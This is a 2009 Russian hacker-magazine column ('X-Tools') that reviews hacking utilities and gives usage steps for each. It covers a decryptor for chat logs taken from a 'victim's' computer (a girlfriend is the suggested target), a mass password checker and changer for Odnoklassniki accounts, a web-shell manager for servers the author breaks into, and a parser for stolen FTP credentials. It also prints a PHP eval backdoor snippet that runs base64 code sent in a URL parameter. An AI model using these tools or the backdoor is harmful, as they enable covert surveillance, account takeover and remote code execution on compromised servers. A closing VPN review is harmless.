Издательский дом ООО "Гейм Лэнд"ЖУРНАЛ ХАКЕР 128, АВГУСТ 2009 г.

X-Tools

Леонид «R0id» Стройков (r0id@mail.ru)

Mail.ru History Reader

  • ОС: WIndows 2000/XP
  • Автор: Gar|k

Различные IM-клиенты в последнее время расплодились в огромном количестве. Причина - растущая популярность онлайновых систем обмена мгновенными сообщениями. В качестве примера можно привести mail-агент от Mail.ru, набравший немаленькую аудиторию юзеров. Мессенджер получился действительно удобный и функциональный, но с одним недостатком - чужую историю переписки в нем почитать не так-то просто. А ведь иногда доступ к хистори необходим, особенно, если она слита с компа твоей девушки :). Однако решение есть, и имя ему - Mail.ru History Reader. Тулза предназначена для дешифровки логов mail-агента и приведения истории переписки в удобочитаемый вид. Использовать утилу довольно просто:

1. Сливаем интересующие нас логи переписки с компа жертвы, вида: blabla@mail.ruhistory.txt

2. Копируем софтинку с нашего DVD себе на винт и запускаем через консоль

3. Указываем history-файл и файл для сохранения результата:

C:conv.exe blabla@mail.ruhistory.txt blabla@mail.ru.txt

4. Получаем файлик blabla@mail.ru.txt , в котором и лежит расшифрованная история переписки :)

Тулза работает с логами mail-агента <= 5.3-версии, так что либо всячески агитируй автора - товарища Gar|k'а – на дальнейшее развитие утилы, либо отговаривай свою девушку обновлять mail-агент. Сорцы утилы ты найдешь на нашем диске.

Odnoklassniki.ru Password Changer & Account Checker

  • ОС: WIndows 2000/XP
  • Автор: Zdez Bil Ya

В прошлых выпусках Х-Тулз я публиковал несколько интересных утил, облегчающих всестороннюю работу с популярными социальными сетями. Не будем нарушать традицию и сразу перейдем к описанию полезного софта, который на этот раз предназначен исключительно для ресурса odnoklassniki.ru и включает в себя две утилы: Odnoklassniki.ru Password Changer и Odnoklassniki.ru Account Checker. Как видно из названий, проги позволяют чекать аккаунты и менять на них пароли в автоматическом режиме. Начнем с ченджера пассов aka утилы для массовой смены паролей на акках в «Одноклассниках». Тулза позволяет:

  • менять пароли на аккаунтах на один заданный пасс
  • менять пароли на аккаунтах на генеренные пассы

Все аккаунты должны храниться в файле accounts.txt, вид записей: логин;пароль. В процессе работы утила использует несколько файлов:

  • good_acc.txt - файл, в который помещаются все успешно смененные пары логин;новый_пароль
  • bad_acc.txt - файл, в который помещаются все неудачно смененные пары логин;старый_пароль
  • error_acc.txt - файл, куда помещаются аккаунты, в процессе обработки которых возникли непредвиденные ошибки

Из возможных причин, по которым аккаунты помещаются в bad_acc.txt, следует выделить:

  • неверный старый пароль
  • не подходит новый пароль (не соответствует правилам в социальной сети)
  • аккаунт заблокирован

Как ты понимаешь, перед запуском ченджера пассов, желательно прочекать список аккаунтов на валид. Для этого мы заюзаем вторую утилу - чекер акков для «Одноклассников»:

  • Все аккаунты должны храниться в файле accounts.txt, вид записей: логин;пароль.
  • В процессе работы утила использует несколько файлов:
    • good_acc.txt - файл, в который помещаются все валидные аккаунты
    • block_acc.txt - файл, в который помещаются все заблокированные аккаунты, доступ к которым закрыт из-за частых попыток логина
    • bad_acc.txt - файл, в который помещаются все невалидные аккаунты
    • error_acc.txt - файл, в который помещаются аккаунты, в процессе обработки которых возникли непредвиденные ошибки

От себя добавлю, что обе утилы довольно удобны и вполне работоспособны. Причем, каждая из тулз является полноценным win32-приложением, а не PHP/перл-скриптом, как их аналоги. Благодарим автора - Zdez Bil Ya – и сливаем проги с нашего диска :).

Shell manager

  • ОС: *nix/win
  • Автор: Krist_ALL

Ежедневно, ломая тот или иной ресурс, мы пополняем свою коллекцию web-шеллов. Не знаю, как у тебя, но у меня в закладках насчитывается более сотни соответствующих линков, и это далеко не предел :). Возникает вполне логичный вопрос: как сортировать и чекать на валид весь этот архив шеллов? Для этой цели товарищем Krist_ALL'ом была написана небольшая утила под названием «Shell manager», позволяющая парсить веб-шеллы по твоему усмотрению. Тулза представляет собой пхп-скрипт, обладающий такими функциями, как:

  • Проверка веб-шеллов на валидность
  • Чекинг веб-шеллов с последующим определением PR/ТИЦ/Alexa_Rank
  • Возможность ведения заметок по каждому веб-шеллу
  • Массовое выполнение команд (отмечаем веб-шеллы, вводим команду и наблюдаем результат выполнения отдельно для каждого веб-шелла)
  • Добавление веб-шеллов из списка
  • Возможность экспорта результатов
  • Наличие авторизации

Использовать скрипт довольно просто:

1. Запускаем скрипт, указав пароль (по дефолту: password)

2. Создаем необходимую таблицу в БД

3. Редактируем файл скрипта, изменив значение переменной $install на 1 и внеся данные о БД:

//----Настройка БД----------------
$db_host = ''; // Хост
$db_login = ''; // Пароль
$db_password = ''; // Пароль
$db_name = ''; // Имя базы данных
//----Настройка Shell Mananger----
$use_auth = 1; // 1 - Использовать авторизацию, 0 - не использовать
$install = 1; //заменить на 1, после создание таблицы
$password = 'password'; //Изменить на свой.

4. Чтобы добавленный веб-шелл чекался - необходимо в его код добавить пару строк:

if(isset($_GET['m'])) {echo 1; exit;}
elseif(isset($_GET['ev'])) { $sss =base64_decode($_GET['ev']); eval($sss); exit; }

5. Все, теперь чекер будет успешно взаимодействовать с добавленным веб-шеллом.

FTP Parser

  • ОС: *nix/win
  • Автор: [QwyZ]

При сборе фтп-акков каждый раз встает один и тот же вопрос: как лучше всего их отпарсить? Причем, речь идет не только о проверке валидности, но и о всевозможных сортировках доменов. Итак, представляю тебе утилу под незамысловатым названием «FTP Parser», способную отпарсить список фтп-учеток по самым разнообразным критериям. Тулза представляет собой PHP-скрипт весом в 3Кб и среди ее характеристик:

  • Поиск красивых доменов среди базы фтп-акков (например, blabla.com)
  • Возможность указания максимальной длины домена
  • Возможность поиска определенных слов среди доменных имен
  • Возможность осуществления поиска в субдоменах
  • Функция сохранения результатов сортировки
  • Автоматическая подсветка доменов, аккаунтов и искомых фраз в тексте
  • Возможность соединения с любым фтп-серверов из списка после обработки запроса

Чтобы заюзать скрипт, следует задать ему несколько обязательных параметров, таких как:

  • $z = доменная зона (например, &z=com), если ограничений нет, то * (например, &z=*)
  • $m = максимальная длина домена (например, &m=14), если ограничений нет, то * (например, &m=*)
  • $base = файл с фтп-акками, который располагается в каталоге ./bases (например, &base=file.txt)
  • $all = включить поиск среди субдоменов (например, &all=1,&all=0)
  • $save = включить функцию сохранения результатов запроса (используется каталог ./querie), например, &save=yes,&save=no
  • $word = поиск определенных слов в доменных именах (например, &word=blabla)

То есть, после того, как ты залил скрипт на сервер, а также создал два каталога - ./bases (с фтп-листом внутри) и ./queries, тебе надо перейти по следующему линку:

http://твой_хост/parser.php?z=com&m=14&base=ftps.txt&all=0&save=yes&word=freehostia.com

Как ты уже понял, значения переменных в запросе напрямую зависят от тебя.

SymVPN

Если у тебя есть более-менее функциональный мобильник, то проблема безопасного веб-серфинга тебе знакома. Под различные мобильные платформы соксификаторы не сыщешь днем с огнем, не говоря уже про полноценный VPN. Однако если ты являешься счастливым обладателем девайса на базе Symbian OS 3rd, считай, что тебе повезло. Не так давно для этой ОС появился функциональный VPN-софт под названием SymVPN, поддерживающий протокол PPTP с шифрованием 128-битным ключом MPPE. Найти утилу ты сможешь на портале www.telexy.com, который принадлежит разработчикам всевозможного полезного софта под Symbian OS. Здесь тебе и SymRDP (Symbian Remote Desktop Connection Client), и SymNC (Network Commander) и много чего еще.

Правда, весь софт платный, но для жителей x-USSR действует скидка в 40% (telexy.com/Support/Publications.aspx?codeid=WGSBI6X6KV), что не так уж и плохо. На самом портале ты можешь слить триальную версию утилы и в течение 14 дней оценить все ее преимущества. Ну и после оценки по достоинству, разумеется, купить за какие-то жалкие 820 рублей :).

Для инсталляции потребуется пройти процедуру регистрации и указать все необходимые данные (email, imei твоей трубы). Это обязательно, ибо копия полученной тобой тулзы привязывается к IMEI-номеру телефона. Так или иначе, после получения линка на софт следует перейти к ее настройке, а именно:

  1. 1. Устанавливаем
  2. 2. Ребутим мобилку
  3. 3. Запускаем утилу, указываем параметры соединения, точку доступа (GPRS/Wi-Fi), IP-сервера, логин с паролем и имя точки доступа, которая будет ассоциироваться с VPN-каналом
  4. 4. Выбираем пункт меню «Проверить». Если все в порядке – софтинка выдаст сетевые реквизиты, которые должны быть получены под VPN (IP/маска/шлюз/DNS)
  5. 5. Запускаем стороннюю программу (можно при вырубленном SymVPN) и при запросе точки доступа лицезрим свежесозданную виртуальную точку. Недолго думая, выбираем ее, и весь трафик послушно форварднется на VPN-туннель

На данный момент софтина адаптирована практически под все юзабельные Symbiain-приложения и работает с большинством известных VPN-сервисов. Так что только ленивый не способен скачать, установить и постоянно использовать эту прекрасную утилу.

Содержание
ttfb: 4.6980381011963 ms